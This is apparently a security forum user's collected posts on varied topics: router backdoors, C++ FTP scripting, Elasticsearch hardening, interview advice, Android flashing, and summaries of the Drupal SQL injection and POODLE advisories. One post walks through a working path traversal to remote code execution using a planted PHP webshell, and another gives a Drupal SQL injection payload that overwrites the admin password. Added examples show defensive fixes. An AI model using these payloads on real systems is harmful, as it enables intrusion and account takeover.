Posts posted by SirGod
-
-
Can you provide us with more information? Do you have a backdoored/vulnerable Bell router? Are you affected by this:
http://www.dslreports.com/forum/r30443059-Bell-Home-Hub-2000-Backdoor-Security-vulnerability
-
Some "magic" for fans of hacks like this. If you want to find out what the following function does and how it works:
float InvSqrt(float x) {
    float xhalf = 0.5f * x;
    int i = *(int *)&x;             // get bits for floating value
    i = 0x5f3759df - (i >> 1);      // gives initial guess y0
    x = *(float *)&i;               // convert bits back to float
    x = x * (1.5f - xhalf * x * x); // Newton step, repeating increases accuracy
    return x;
}
You can read:
-
Add validation so that avatarurl is a valid URL, or you can strip localhost (plus variants). In any case, it only works if Memcached is used.
-
Welcome!

-
Location: Bucharest. PM for more details.
-
I solved it in a way, but now...
#include <iostream>
#include <windows.h>
#include <fstream>
#include <string>
#include <cstdlib>
using namespace std;
int main()
{
    string nume;
    char mesaj[60];
    ofstream g("c:\\Windows\\windows.txt");
    g << "open ftp.site\n";
    g << "username\n";
    g << "parola\n";
    g.close();
    system("cd C:\\Windows");
    system("ftp -s:windows.txt");
    system("bin");
    system("get test.rar");
    ofstream chat("chat.txt", ios::app);
    cout << "Introdu numele tau.MAXIM 6 CARACTERE";
    cin >> nume;
    cout << "Introdu mesajul";
    cin >> ws;                          // skip the newline left by cin >> nume
    cin.getline(mesaj, sizeof(mesaj));  // never read more than the buffer holds
    chat << nume << ":" << mesaj << endl;
    chat.close();
}
Everything stops after system("ftp -s:windows.txt");, even if I put other commands in the windows.txt file...
Well, how could it work, you're making the same mistake. You're using system() and executing the commands one at a time. It's the equivalent of: you open a terminal, connect to FTP, close the terminal, open a terminal and enter an FTP command. Except that you're no longer connected to FTP; the "terminal session" is no longer the same. You're running the FTP command on the system.
As a general example, use a library that returns a connection/session/object representing the active session, and use it to execute successive commands.
I had a similar experience with SSH, in another language, but something similar probably exists in C++ too.
-
I too have thought about switching to Windows Phone, specifically the Nokia Lumia 930. Even though it has everything it needs, what keeps me away is the fact that it has no native Google apps (GMail, Google Maps, Chrome etc.) and, because I won't use 3rd party apps for services like these, it forces me to move to OneDrive, Nokia Maps, Outlook, Internet Explorer etc.
-
Fix (the Debian way):
echo "script.groovy.sandbox.enabled: false" >> /etc/elasticsearch/elasticsearch.yml
/etc/init.d/elasticsearch restart
If you want to be more professional about it, restrict by IP. Example:
iptables -A INPUT -p tcp --dport 9200:9300 -s your_fucking_ip_address -j ACCEPT
iptables -A INPUT -p tcp --dport 9200:9300 -j DROP
I think you don't know what elasticsearch is.
If Aerosol understood everything he posts, he'd knock us all on our asses.
-
Since I've also been invited to an interview tomorrow, I followed @MrGrj's lead and made an off-topic of my own to lift my morale. What could I expect? Considering that I haven't received any details... I was only told to "prepare technically".
The employer's requirements:
The job is entry / middle. I want to tell you that I have no experience on a team or whatever, I'm no ace at PHP - I understand its concept and how it works, but I don't know all of its functions and I have a harder time with classes. This is already the 5th interview and I don't want to blow it; so far I've only gotten screwed.
Those of you who work in the field, tell me where to start.
Hold on. You're applying for a junior/middle job that asks for 1-2 years of experience and you "have a hard time with classes"? Why do you think you can get hired as a junior knowing 5 functions and 3 conditions, all looked up on Google?
For a junior position, and even an internship, at any decent company, you need solid OOP knowledge, so that you don't spend 3 hours trying to instantiate an abstract class.
In JavaScript they won't have you writing alerts, and they won't wait 3 hours for you to put a hide on an onclick.
In MySQL you won't be doing only selects and inserts, and they won't wait 3 hours for you to write 5 joins or put 3 indexes where they belong.
It would be good to have worked with a few libraries, to have a clue about performance and security, to know what SPL is. To write readable and extensible code. To have worked with, or have a clue about, a popular framework.
You should not need to search Google for MYISAM, InnoDB, how to install a PHP extension or how to make a commit on SVN.
The list can go on forever. A Junior position does not mean a novice position in that language. You'll learn along the way, but you have to bring something substantial too.
-
@all:
I solved the camera problem using something 3rd party: Camera Zoom FX.
Regarding silent mode, a new concept has been introduced, which you can access from the volume buttons: it is configurable and more interesting than before.
I'd say it's worth it, apart from a few minor bugs. It runs much better, looks much better, and has good built-in features (e.g. privacy manager). The only thing is that you lose Samsung's proprietary software.
-
so that you get a 300 euro bonus, because that's what they said on TV
Yes, boss, you caught me... I get 10,000 Euro and I figured that from the 150,000 members RST has I'd make enough for the Ferrari I've wanted since 5th grade. And all that on your back and RST's, muhahaha!
-
As the title says, we are looking for: Java Enterprise dev, QA Engineer, Lead Sysadmin and PHP developer. PM for details. Location: Bucharest.
-
These would be the steps, roughly:
1. Root the phone (e.g. CF-Auto-Root)
2. Flash a recovery with Odin (e.g. TWRP)
3. Flash a ROM from recovery
Read the sticky threads here and you'll know everything you need:
Samsung Galaxy S 4 i9500, i9505, i9505G, i9506 - XDA Forums
PS:
- make a backup of EFS
- to use Odin you have to be in download mode
- before flashing a ROM, make a backup from recovery and then wipe system/data
I recently installed Android 5.0.1 Lollipop, also on an S4; more details here:
It runs flawlessly, I haven't run into any bugs so far.
-
Boss, what are you doing, bringing a scanner's results to show off?
-
Try changing the default messaging app.
-
I want one too. As a model, something like this would be OK:

Logo and "Romanian Security Team" in color, with the motto underneath.
-
How can I use it?
It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves:
Let's take a look at stats.php:
if(!isset($_COOKIE['live_stats_id' . $hash]))
{
    ...
}
else
{
    # Backup from a previous request
    $live_stats_id = $_COOKIE['live_stats_id' . $hash];
}
If the 'live_stats_id' . $hash cookie is not set, it is created (with values that we can change). Take a look here:
$hash is:
$hash = md5($_GET['cluster']);
and cluster is a variable that we can simply set via a GET request:
if(isset($_GET['cluster']) && ($_GET['cluster'] != null)){ $cluster = $_GET['cluster'];}
So, if we set the $cluster variable to test, the cookie name should become:
live_stats_id098f6bcd4621d373cade4e832627b4f6
Then we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable:
$file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id;
The $file_path variable will become:
Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6
We can change the cookie value to "/../../rce.php", so $file_path will become:
Temp/live_stats./../../rce.php
Then we can see that a file called rce.php has been created in the root directory.
Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want):
<?php system($_GET['cmd']);?>
Then save the configuration. Now all you have to do is execute your command (example):
http://127.0.0.1/rce.php?cmd=whoami
And you'll get:
a:1:{s:33:"www-data :123";a:1:{s:10:"query_time";i:1;}}
Have fun, I hope you learned something.

-
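Added example (not part of the post above and not the project's own code): one way to close the path traversal described in the stats.php walkthrough is to accept only identifiers of the shape the application generates and to confirm the resulting file stays inside the temp directory. The function names and the assumed id format (a decimal number followed by the md5 of the cluster name, as in the sample path in the post) are assumptions.

```php
<?php
// Added example, not code from the post or the project. It hardens the
// pattern shown above, where a cookie value is appended to "live_stats."
// to form a file name. Function names are hypothetical.

/**
 * Accept only the shape seen in the post's sample path: a decimal number
 * followed by the 32-character md5 hex of the cluster name (assumption).
 */
function is_valid_live_stats_id(string $id): bool
{
    // \A and \z anchor the whole string, so a trailing newline is rejected.
    return preg_match('/\A[0-9]{1,20}[0-9a-f]{32}\z/', $id) === 1;
}

/** Build the stats file path, refusing any id that could leave $baseDir. */
function live_stats_path(string $baseDir, string $id): string
{
    if (!is_valid_live_stats_id($id)) {
        throw new InvalidArgumentException('live_stats_id rejected');
    }
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('temp directory not found');
    }
    $path = $base . DIRECTORY_SEPARATOR . 'live_stats.' . $id;
    // Defence in depth: the file must sit directly inside the temp directory.
    if (dirname($path) !== $base) {
        throw new RuntimeException('path escapes temp directory');
    }
    return $path;
}

// Constructed sample cookie values; the second is the value from the post.
$samples = [
    '1022488408098f6bcd4621d373cade4e832627b4f6',
    '/../../rce.php',
    "1022488408098f6bcd4621d373cade4e832627b4f6\n",
    '1022488408098f6bcd4621d373cade4e832627b4f6.php',
];
foreach ($samples as $value) {
    try {
        echo 'accepted: ', live_stats_path(sys_get_temp_dir(), $value), PHP_EOL;
    } catch (Exception $e) {
        echo 'rejected: ', json_encode($value), ' (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

Only the first sample is accepted; a value that is rejected should be discarded and a fresh identifier generated server-side rather than sanitised and reused.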
-
1. Introduction
Reflected File Download (RFD) is a web attack vector that enables attackers to gain
complete control over a victim’s machine. In an RFD attack, the user follows a
malicious link to a trusted domain resulting in a file download from that domain.
Once executed, it’s basically "game over", as the attacker can execute commands
on the Operating System level of the client’s computer.
Content:
1. Introduction
  1.1. RFD Attack Flow
  1.2. Implications
  1.3. RFD Requirements
  1.4. RFD & JSON
2. Detecting RFD
  2.1. Looking for Reflected Input
    2.1.1. Breaking context for command execution
    2.1.2. Injection of command separators and commands
  2.2. Controlling the Filename
    2.2.1. Adding forwardslashes
    2.2.2. Adding Path Parameters (the semicolon character)
    2.2.3. Filenames and Extensions Suitable for RFD
    2.2.4. Windows 7 security feature bypass
  2.3. Forcing Responses to Download
    2.3.1. Content-Type & Downloads
    2.3.2. The Content-Disposition Header
    2.3.3. Using the Download Attribute of the Anchor Tag
    2.3.4. Download Happens, Deal with it!
3. RFD Advanced Exploitation
  3.1. Exploiting RFD to gain control over all websites in Chrome
  3.2. Using PowerShell as a ‘Dropper’
  3.3. Exploiting JSONP Callbacks to Execute Malware
4. Mitigations
5. Acknowledgments
Full document:
https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view
-
Happy reading.

Content:
* Introduction
  * Goals and Focus
  * Syllabus layout
* Contributions
  * How we’ll organize work
  * How to contribute
  * Rewards for contributions
  * Ops School Videos
  * How to write sections
  * Overwriting existing content
  * Credits
* Guidelines
* Careers in Operations
  * Deciding a career path
  * Generalized career paths
  * Specialized career paths
  * How to become an operations engineer
* Sysadmin 101
  * What is Systems Administration?
  * What is Development?
  * Contrasting Development and Operations
  * History of Development and Operations
  * What System Administration Isn’t
* Unix fundamentals 101
  * File systems
  * Shells
  * Package management
  * The Boot Process
  * Useful shell tools
  * Crontab
* Unix fundamentals 201
  * Kernel tuning
  * Signals
  * Syscalls
  * Booting over the network
  * /bin/init and its descendants
  * Looking at system metrics
* MS Windows fundamentals 101
* Text Editing 101
  * A little history
  * vi basics
* Text Editing 201
  * Vim
  * Emacs
* Tools for productivity
  * Terminal emulators
  * SSH
  * SSH Use Cases
  * Multiplexers
  * Shell customisations
  * Mosh
  * Ticketing systems
  * Note-taking
* Security 101
  * Authentication in unix
  * Adding and deleting users and groups
  * Standard unix filesystem permissions
  * PAM
  * Chroot, jails and containers
  * Sudo (or, “Why you should not log in as root”)
  * History and Lore
* Security 201
  * Centralised accounts
  * Firewalls and packet filters
  * Public Key Cryptography
  * Two factor authentication
  * Building systems to be auditable
  * Network Intrusion Detection
  * Host Intrusion Detection
  * Defense practices
  * Risk and risk management
  * Compliance: The bare minimum
  * Dealing with security incidents
  * ACLs and extended attributes (xattrs)
  * SELinux
  * Data placement
  * Additional reading
* Troubleshooting
  * Methodologies
  * Working effectively during a crisis
* Networking 101
  * The RFC Documents
  * OSI 7-layer model (OSI Reference Model)
  * TCP/IP (ARPA) 4-layer model
  * IP Addressing
  * TCP vs UDP
  * Subnetting, netmasks and CIDR
  * Private address space (RFC 1918)
  * Static routing
  * NAT
  * Networking cable
* Networking 201
  * VLANs, 802.1q tagging
  * Spanning Tree
  * Static Routing
  * Dynamic routing protocols (RIP, OSPF, BGP)
  * ACLs
  * Network Bonding (802.3ad / LACP link aggregation)
  * IOS switch configuration
  * GRE and other tunnels
  * Multi-homed hosts
  * Similarities and differences between IPv4 and IPv6 networking
  * Implications of dual-stack firewalls (especially under Linux)
  * Multicast uses and limitations
  * Latency vs. Bandwidth
  * VPNs
* Common services
  * System daemons 101
  * DNS 101
  * DNS 201
  * DHCP
  * HTTP 101 (Core protocol)
  * HTTP 201 (Application Servers & Frameworks)
  * SMTP 101
  * SMTP 201
* Identity Management 101
  * LDAP
  * NIS
* Active Directory 101
  * What is Active Directory?
  * What is Active Directory used for?
  * You mention “separate components”; what is Active Directory composed of?
  * What specific services does Active Directory provide?
  * Best Practices for managing an Active Directory installation
* Active Directory 201
  * Detailed Breakdown of Active Directory Components/Services
  * Advanced Active Directory Maintenance
* Remote Filesystems 101
  * NFSv3
  * iSCSI
  * SAMBA/CIFS
* Remote Filesystems 201
  * GlusterFS
  * NFSv4
  * Netatalk / AFP
  * S3
* Programming 101
  * Shell scripting basics
  * Regular Expressions
  * Sed & awk
  * GIGO
* Programming 201
  * Common elements in scripting, and what they do
  * C (A very basic overview)
  * Ruby
  * Python
  * Version Control
  * API design fundamentals
  * Continuous Integration
* Hardware 101
  * Hardware Types
  * Basic server architecture
  * Disk management
  * Performance/Redundancy
  * Troubleshooting
* Datacenters 101
  * Power budgets
  * Cooling budgets
  * You will be judged by the tidiness of your rack
  * Machine and cable labeling
  * Traditional naming conventions
* Datacenters 201
  * Networking many racks
  * Power
  * Cooling
  * Physical security and common security standards compliance requirements
  * Suggested practices
* Datacenters 301
  * Power
  * Increasing cooling efficiency
  * Design Options
* Virtualization 101
  * Intro to virtualization technologies
  * The Cloud
* Virtualization 201
  * Managing virtualized infrastructures (Private clouds)
  * Leveraging virtualization for development
  * Leveraging virtualization for production
  * Security implications of virtualization
* Logs 101
  * Common system logs & formats
  * Standard Error
  * Log files
  * Syslog
  * Log rotation, append, truncate
  * Retention and archival
* Logs 201
  * Centralized logging
  * Log parsing
  * Search & Correlation
* Databases 101 (Relational Databases)
  * What is a Database?
  * What is a Relational Database?
  * Why We Use Databases?
  * What is SQL?
  * SQL shell
  * Creating databases
  * Creating users
  * Create Tables
  * Alter Table
  * Drop Table
  * Data Type
  * Granting privileges
  * Removing Privileges
  * Basic normalized schema design
  * Select, Insert, Update and Delete
  * Pro Tips
* Databases 201
  * Database Theory
  * Document Databases
  * Key-value Stores
  * Graph Databases
* Application Components 201
  * Message Brokers
  * Memory Caches
  * Specialized Caches
* Load Balancing
  * Why do we use load balancers?
  * Application implications
  * Non-HTTP use cases
  * Software
  * Hardware
  * Multi-dc
* Monitoring, Notifications, and Metrics 101
  * History: How we used to monitor, and how we got better (monitors as tests)
  * Perspective (end-to-end) vs Introspective monitoring
  * Metrics: what to collect, what to do with them
  * Common tools
* Monitoring, Notifications, and Metrics 201
  * Dataviz & Graphing
  * Graphite, StatsD
  * Dashboard: Info for ops and info for the business
  * Third-party tools
* Business Continuity Planning
  * Backups
  * Outages
  * Postmortems
  * Disaster Recovery
* Architecture 101
  * How to make good architecture decisions
  * Patterns and anti-patterns
  * Introduction to availability
  * Introduction to scalability
* Architecture 201
  * Service Oriented Architectures
  * Fault tolerance, fault protection, masking, dependability fundamentals
  * Caching Concerns
  * Crash only
  * Synchronous vs. Asynchronous
  * Business continuity vs. Disaster Recovery
  * Designing for Scalability: Horizontal, Vertical
  * Simplicity
  * Performance
  * Tiered architectures
  * MTTR > MTBF
* Configuration Management 101
  * A Brief History of Configuration Management
  * Idempotence
  * Convergent and Congruent systems
  * Direct and Indirect systems: ansible, capistrano
  * Chef
* Configuration Management 201
  * Ansible
  * Puppet
  * Cfengine 3
  * SaltStack
* Capacity Planning
  * Fundamentals of capacity planning
  * Forecasting
  * Diagonal scaling
* Statistics For Engineers
  * Normal distributions
  * Percentiles, histograms, averages, mean, medians
* Software Deployment 101
  * Software deployment vs configuration management
  * Running services
  * Package management
* Software Deployment 201
  * Running services
* Soft Skills 101
  * Communication basics
  * Communication Modes
  * Special cases for operations
  * Time Management
  * Project Management
  * The Tao of DevOps
  * The importance of Documentation
  * Working with other teams
* Soft Skills 201
  * Business Acumen in Operations
  * Understanding the role of operations
  * Thinking broadly
  * Promoting Change
  * Building basic business skills
  * Specific Examples
* Labs exercises
  * Bare-Metal Provisioning 101
  * Bare-Metal Provisioning 201
  * Cloud Provisioning 101
  * Cloud Provisioning 201
  * Database 101
  * Database 201
  * Database 301
  * Automation 101
  * Automation - Chef 201
  * Automation - Chef 301
  * Automation - Chef 302
  * Automation - Puppet 201
  * Automation - Puppet 301
  * Package Management 101
  * Package Management 201
  * Build automation fleets
  * Version Control with Git 101
  * DNS 101
  * HTTP 101
* Learning and the Community
  * Learning and strategies for improvement
  * Things to keep in mind as you learn how to be an engineer
  * Golden rules for careers in ops
  * Where to look for help in the community
* See also
* Contributions
  * How we’ll organize work
  * How to contribute
  * Rewards for contributions
  * Ops School Videos
  * How to write sections
  * Overwriting existing content
  * Credits
* Conventions
  * Style Guide
  * Sample Network
* Style Guide
  * Editing
* Glossary
Link:
http://www.opsschool.org/en/latest/index.html
-
Thanks Nytro.
Does anyone know how a value can be read from the DB instead of doing an update?
Hint 1:
MySQL :: MySQL 5.0 Reference Manual :: 13.2.8 SELECT Syntax
Hint 2: the "post_data" variable must be modified:
"name[0%20;update+users+set+name%3d\'" \
+user \
+"'+,+pass+%3d+'" \
+hash[:55] \
+"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
Hint 3: array[key]
Hint 4: urldecode
Hint 5: escape
Hint 6: concatenation
Good luck!

-
The Vulnerability
All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:
SELECT * FROM {users} WHERE name IN (:name_0, :name_1)
This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this:
SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)
which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example.
If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.
Source and full article:
https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html
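Added example (not from the quoted article and not Drupal's code): a simplified model of the placeholder expansion described above, with the key-based expansion next to a version that discards the keys, plus an input check for plain lists. The function names are hypothetical, and the keyed sample input is constructed to reproduce the query already shown in the quoted text.

```php
<?php
// Added example: simplified model of the placeholder expansion described
// in the quoted text. Not Drupal's code; all function names are hypothetical.

/** Flawed expansion: placeholder names are built from the array KEYS. */
function expand_with_keys(string $sql, string $ph, array $values): array
{
    $names = [];
    $args = [];
    foreach ($values as $key => $value) {
        $name = $ph . '_' . $key;   // key text is copied into the SQL string
        $names[] = $name;
        $args[$name] = $value;
    }
    return [str_replace($ph, implode(', ', $names), $sql), $args];
}

/** Corrected expansion: array_values() drops the keys, giving _0, _1, ... */
function expand_with_indexes(string $sql, string $ph, array $values): array
{
    return expand_with_keys($sql, $ph, array_values($values));
}

/** Input-side check: true only for arrays keyed 0..n-1 in order. */
function is_plain_list(array $values): bool
{
    return $values === [] || array_keys($values) === range(0, count($values) - 1);
}

$sql = 'SELECT * FROM {users} WHERE name IN (:name)';

// Constructed inputs: a normal list, and an array whose keys carry SQL text.
$inputs = [
    'list'  => ['alice', 'bob'],
    'keyed' => ["test) OR name = 'Admin' -- " => 'x', 'test' => 'y'],
];

foreach ($inputs as $label => $values) {
    [$flawed] = expand_with_keys($sql, ':name', $values);
    [$fixed]  = expand_with_indexes($sql, ':name', $values);
    printf(
        "%s (plain list: %s)\n  key-based:   %s\n  index-based: %s\n",
        $label,
        is_plain_list($values) ? 'yes' : 'no',
        $flawed,
        $fixed
    );
}
```

For the keyed input the key-based expansion yields the altered query from the quoted text, while the index-based expansion yields `IN (:name_0, :name_1)` for both inputs.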
-
Database of vulnerabilities in WordPress, plugins and themes. Constantly updated.
Link:
https://wpvulndb.com/
-
Today we are publishing details of a vulnerability in the design of SSL version 3.0. This vulnerability allows the plaintext of secure connections to be calculated by a network attacker. I discovered this issue in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers).
SSL 3.0 is nearly 15 years old, but support for it remains widespread. Most importantly, nearly all browsers support it and, in order to work around bugs in HTTPS servers, browsers will retry failed connections with older protocol versions, including SSL 3.0. Because a network attacker can cause connection failures, they can trigger the use of SSL 3.0 and then exploit this issue.
Disabling SSL 3.0 support, or CBC-mode ciphers with SSL 3.0, is sufficient to mitigate this issue, but presents significant compatibility problems, even today. Therefore our recommended response is to support TLS_FALLBACK_SCSV. This is a mechanism that solves the problems caused by retrying failed connections and thus prevents attackers from inducing browsers to use SSL 3.0. It also prevents downgrades from TLS 1.2 to 1.1 or 1.0 and so may help prevent future attacks.
Google Chrome and our servers have supported TLS_FALLBACK_SCSV since February and thus we have good evidence that it can be used without compatibility problems. Additionally, Google Chrome will begin testing changes today that disable the fallback to SSL 3.0. This change will break some sites and those sites will need to be updated quickly.
In the coming months, we hope to remove support for SSL 3.0 completely from our client products.
Thank you to all the people who helped review and discuss responses to this issue.
Source:
http://googleonlinesecurity.blogspot.ro/2014/10/this-poodle-bites-exploiting-ssl-30.html
Local root exploit need it!
in Trash
Posted · Edited by wildchild
Sorry for the edit, he doesn't deserve help. He's just a beggar!